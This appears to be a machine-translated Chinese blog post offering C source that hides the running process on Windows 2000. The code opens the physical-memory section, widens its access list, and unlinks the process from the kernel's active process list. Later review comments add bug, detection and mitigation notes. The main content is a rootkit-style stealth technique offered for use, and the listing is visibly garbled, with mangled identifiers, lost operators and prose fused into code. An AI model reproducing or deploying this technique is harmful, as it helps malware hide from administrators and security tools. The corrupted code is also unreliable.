Win2000 system process hidden code

xiaoxiao2021-03-06  85

I am very sorry: in my hurry I left a small bug. The "ZwOpenSection (... | SECTION_MAP_WRITE, & attributes)" call made the first run return failure. Please delete the original text; the corrected version is:

PJF (jfpan20000@sina.com)

I mentioned this last time and, because it is so simple, thought there was no need to say more. But someone asked me to write it up, so here are a few words:

Many posts have already analyzed process hiding, for example through API hooks, system service hooks, and so on.

Here I describe a method of completely hiding a process on Windows 2000. It is very simple and contains no new ideas.

Before the explanation, a few structures. The executive process block (EPROCESS) contains several process-related linked lists, one of which is the active process list. An important role of this list is to be traversed when system information is queried for the currently active processes. Interestingly, M$, perhaps for efficiency reasons, does not use it for things such as process switching, so a process that is missing from the list runs on without any problem that cannot be ignored (this is the foundation of this program).

How to do it is obvious: remove the process you want to hide from the doubly linked active process list, and even a kernel debugger (such as SoftICE's PROC command) cannot find it.

The code for hiding the current process under 2000 is as follows:

#include #include #include

/*
 * NT status helpers and local re-declarations of the native IO_STATUS_BLOCK
 * and UNICODE_STRING structures used by the rest of the listing.
 * status_access_denied is the value OpenPhysicalMemory compares against.
 * NOTE(review): the listing was mangled in transcription (identifier case,
 * unbalanced parentheses and braces, several directives collapsed onto one
 * line) and does not compile as shown.
 */
#define nt_success (status) (status)> = 0) #define status_info_length_mismatch ((ntstatus) 0xc000000004L) #define status_access_denied ((ntstatus) 0xc0000022L)

Typedef long ntstatus; typedef struct _io_status_block {ntstatus status; ulong information;}} o_status_block, * pio_status_block;

Typedef struct _unicode_string {ushort length; ushort maximumlength; pwstr buffer;} unicode_string, * punicode_string;

/*
 * Object-attribute flag values, the OBJECT_ATTRIBUTES structure passed to
 * ZwOpenSection, and function-pointer types for the two ntdll.dll exports
 * (ZwOpenSection, RtlInitUnicodeString) that the listing resolves at run time
 * with GetProcAddress instead of linking against them.
 * None of the OBJ_* flags is used below: OpenPhysicalMemory sets
 * attributes.Attributes to 0.
 */
#define OBJ_INHERIT 0x00000002L #define OBJ_PERMANENT 0x00000010L #define OBJ_EXCLUSIVE 0x00000020L #define OBJ_CASE_INSENSITIVE 0x00000040L #define OBJ_OPENIF 0x00000080L #define OBJ_OPENLINK 0x00000100L #define OBJ_KERNEL_HANDLE 0x00000200L #define OBJ_VALID_ATTRIBUTES 0x000003F2L

typedef struct _OBJECT_ATTRIBUTES {ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService;} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; typedef NTSTATUS (CALLBACK * ZWOPENSECTION) (OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes);

TypedEf void (Callback * RTLinitUnicodeString) (In Out Punicode_String DestinationString, In Pcwstr SourceString);

/*
 * File-scope state shared by every function below:
 *   - the two resolved ntdll.dll function pointers,
 *   - g_hntdll: module handle returned by the library load in initddll,
 *   - g_pmapphysicalmemory: view of the page mapped at physical offset 0x30000
 *     by OpenPhysicalMemory, later passed to LinearToPhys as the page directory,
 *   - g_hmpm: handle to the physical-memory section object.
 */
RtlinitunicodeString; zwopensection zwopense; hModule g_hntdll = null; pvoid g_pmapphysicalmemory = null; handle g_hmpm = null;

/*
 * Loads ntdll.dll and resolves RtlInitUnicodeString and ZwOpenSection by name,
 * storing the results in the file-scope function pointers.
 * Returns false when the library cannot be loaded, TRUE otherwise.
 * NOTE(review): neither GetProcAddress result is checked for NULL before
 * TRUE is returned, so a failed lookup is only discovered when the pointer
 * is called.
 */
Bool initddll () {g_hntdll = loadingLibrary ("ntdll.dll"); if (! G_hntdll) {return false;}

RtlInitUnicodeString = (RTLINITUNICODESTRING) GetProcAddress (g_hNtDLL, "RtlInitUnicodeString"); ZwOpenSection = (ZWOPENSECTION) GetProcAddress (g_hNtDLL, "ZwOpenSection"); return TRUE;}

/* Releases the ntdll.dll module handle taken in initddll, if one is held. */
Void Closentdll () {if (g_hntdll! = Null) {freeelibrary (g_hntdll);}}

/*
 * Rewrites the DACL of the section object behind hSection so that the calling
 * user is granted SECTION_MAP_WRITE.
 * Steps visible in the code: read the current DACL with GetSecurityInfo, build
 * one EXPLICIT_ACCESS entry (GRANT_ACCESS, no inheritance, trustee name
 * "CURRENT_USER"), merge it with SetEntriesInAcl, and store the result with
 * SetSecurityInfo. pSD and pNewDacl are released with LocalFree on every path.
 * The function returns VOID, so a failure of any step is invisible to the
 * caller.
 * NOTE(review): this changes the access control of a kernel object, not only
 * of this handle; presumably the widened DACL stays in effect after the
 * process exits. Confirm on the target OS.
 * Detection: a WRITE_DAC open followed by a DACL change on the
 * physical-memory section is not normal application behaviour and is worth
 * alerting on where object-access auditing or EDR telemetry covers it.
 * NOTE(review): the listing is garbled here (the closing brace is missing).
 */
VOID SetPhyscialMemorySectionCanBeWrited (HANDLE hSection) {PACL pDacl = NULL; PACL pNewDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; DWORD dwRes; EXPLICIT_ACCESS ea; if (dwRes = GetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, & pDacl, NULL, & pSD) ! = ERROR_SUCCESS) {goto CleanUp;} ZeroMemory (& ea, sizeof (EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance = NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; if (! dwRes = SetEntriesInAcl (1, & ea, pDacl, & pNewDacl) = ERROR_SUCCESS) {goto CleanUp;} if (dwRes = SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, PNEWDACL, NULL)! = Error_Success) {goto cleanup;} Cleanup: IF (PSD) LocalFree (PSD); if (PNewDACL) LocalFree (PNEWDACL);

/*
 * Opens the physical-memory section object for read/write mapping and maps
 * one 0x1000-byte view at offset 0x30000 into g_pMapPhysicalMemory.
 * If the first ZwOpenSection call returns STATUS_ACCESS_DENIED, the section is
 * reopened with READ_CONTROL | WRITE_DAC, its DACL is widened by
 * SetPhyscialMemorySectionCanBeWrited, the handle is closed, and the
 * read/write open is retried.
 * Returns the section handle (also stored in g_hMPM), or NULL on failure.
 * NOTE(review): the status of the READ_CONTROL | WRITE_DAC open is not
 * checked before the handle is used and closed.
 * NOTE(review): the listing is garbled: the object path literal, the
 * NT_SUCCESS test as printed, and the missing closing brace are all
 * unreliable, and the author's note at the top of the page says this call
 * sequence was corrected for a first-run failure.
 * Defensive context: Windows Server 2003 SP1 and later refuse user-mode opens
 * of \Device\PhysicalMemory, which removes this access path. On older systems
 * the retry depends on the caller being allowed WRITE_DAC on the section;
 * presumably that means administrative rights. Confirm against the object's
 * default DACL.
 * Detection: any user-mode request for write access or WRITE_DAC on this
 * object is a high-signal event.
 */
HANDLE OpenPhysicalMemory () {NTSTATUS status; UNICODE_STRING physmemString; OBJECT_ATTRIBUTES attributes; RtlInitUnicodeString (& physmemString, L "// Device // PhysicalMemory"); attributes.Length = sizeof (OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = & physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes.SecurityQualityOfService = NULL; status = ZwOpenSection (& g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, & attributes); if (status == STATUS_ACCESS_DENIED) {status = ZwOpenSection (& g_hMPM, READ_CONTROL | WRITE_DAC, & attributes ); SetPhyscialMemorySectionCanBeWrited (g_hMPM); CloseHandle (g_hMPM); status = ZwOpenSection (& g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, & attributes);!} if (NT_SUCCESS (status)) {return NULL;} g_pMapPhysicalMemory = MapViewOfFile (g_hMPM, 4, 0, 0x30000 , 0x1000); if (g_pmapphysicalmemory == null ) {RETURN NULL;} Return G_HMPM;

/*
 * Translates a virtual address to a physical address by walking page tables
 * through views of the physical-memory section.
 * BaseAddress is treated as a page directory indexed by the top 10 bits of
 * the address (VAddr >> 22). Bit 0 of an entry is tested as "present" and bit
 * 0x80 selects the large-page case; otherwise the referenced page table is
 * mapped with MapViewOfFile and indexed by bits 12..21 of the address.
 * Returns 0 when the directory entry or the table entry is not present.
 * NOTE(review): the 10/10/12 split assumes two-level 32-bit paging without
 * PAE; confirm before relying on any result.
 * NOTE(review): the MapViewOfFile result stored in PGDE is dereferenced
 * without a NULL check, and on the not-present table-entry path the view is
 * not unmapped before returning.
 * NOTE(review): the listing is garbled and does not compile as shown.
 */
PVOID LinearToPhys (PULONG BaseAddress, PVOID addr) {ULONG VAddr = (ULONG) addr, PGDE, PTE, PAddr; PGDE = BaseAddress [VAddr >> 22]; if ((PGDE & 1) = 0!) {ULONG tmp = PGDE & 0x00000080; if (TMP! = 0) {PADDR = (pgde & 0xffc00000) (VADDR & 0x003FFFF);} else {pgde = (ulong) MapViewOffile (g_hmpm, 4, 0, pgde & 0xffff000, 0x1000); PTE = ((pulong) PGDE) [ vAddr & 0x003FF000) >> 12]; if ((PTE & 1) = 0) {PAddr = (PTE & 0xFFFFF000) (vAddr & 0x00000FFF); UnmapViewOfFile ((PVOID) PGDE);}! else return 0;}} else return 0; return (PVOID) Paddr;}

/*
 * Reads one ULONG from the given virtual address by way of physical memory:
 * translates the address with LinearToPhys, maps the containing 0x1000-byte
 * page (access value 4, i.e. FILE_MAP_READ), reads the word at the in-page
 * offset, and unmaps the view.
 * Returns the value read, or 0 when the view cannot be mapped.
 * NOTE(review): 0 is also a legitimate data value, so callers cannot tell
 * failure from success. A 0 result from LinearToPhys (translation failed) is
 * not checked, so physical page 0 would be read instead.
 */
ULONG GetData (PVOID addr) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, 4, 0, phys & 0xfffff000, 0x1000); if (tmp == 0) Return 0; Ulong Ret = TMP [(PHYS & 0xFFF) >> 2]; unmapViewoffile (TMP); return ret;}

/*
 * Writes one ULONG to the given virtual address by way of physical memory:
 * translates the address with LinearToPhys, maps the containing page with
 * FILE_MAP_WRITE, stores the word at the in-page offset, and unmaps the view.
 * Returns False when the view cannot be mapped, True otherwise.
 * NOTE(review): a 0 result from LinearToPhys is not checked, so a failed
 * translation would write into physical page 0.
 * NOTE(review): the store goes straight into memory the kernel owns, with no
 * locking visible in this listing. The page's own text concedes "small
 * problems after running for a while"; corrupted kernel lists typically end
 * in a system crash.
 */
BOOL SetData (PVOID addr, ULONG data) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); IF (TMP == 0) Return False; TMP [(PHYS & 0xFFF) >> 2] = data; unmapViewoffile (TMP); Return True;}

/*
 * Entry point of the listing: unlinks the calling process from the kernel's
 * doubly linked active process list, so that enumeration built on that list
 * no longer reports it.
 * Sequence visible in the code: initialise ntdll pointers, open and map
 * physical memory, read the current thread pointer from the fixed address
 * 0xFFDFF124, follow hard-coded structure offsets (0x22c, 0xA0) to the
 * process's list links, rewrite the neighbouring entries with SetData, then
 * unmap, close the section handle and unload ntdll.
 * The fixed address and offsets are build-specific; the page itself says the
 * offsets must change for NT / XP / 2003.
 * NOTE(review): as printed, TRUE is returned even when initialisation fails,
 * and no GetData/SetData result is checked.
 * NOTE(review): the listing is garbled (operators and parentheses lost) and
 * does not compile as shown. The sentence after the closing brace is article
 * prose that the extraction fused onto the code line.
 * Detection: the process keeps its threads, handles and other kernel
 * bookkeeping, so cross-view comparison (the active process list against
 * scheduler thread lists, handle tables or similar sources) exposes the
 * mismatch. Memory forensics on a captured image does the same offline.
 * Mitigation: Windows Server 2003 SP1 and later block user-mode access to
 * \Device\PhysicalMemory; on older hosts, restrict administrative rights and
 * audit access to that object.
 */
BOOL HideProcessAtAll () {if (InitNTDLL ()) {if (OpenPhysicalMemory () == 0) {return FALSE;} ULONG thread = GetData ((PVOID) 0xFFDFF124); ULONG process = GetData (PVOID (thread 0x22c)); Ulong fw = getdata (PVOID (Process 0xA0)), BW = getData (PVOID (PVOID (FW 4), BW); SetData (PVOID (BW), FW); UnmapViewoffile (g_pmapphysicalmemory CLOSEHANDLE (G_HMPM); closentdll ();} returntrue;} Call hideProcessatall hides the current process, if you hide, you will modify the process activity chain head, you may have some small problems after running for a while, how to resolve, stay "After class posts" ^ _ ^

Note that the code assumes by default that physical address 0x30000 holds a page directory. This is true in most cases, but there are exceptions! How to solve that is also left as "...", enough said.

With slightly changed offsets, the code can be ported to NT / XP / 2003.
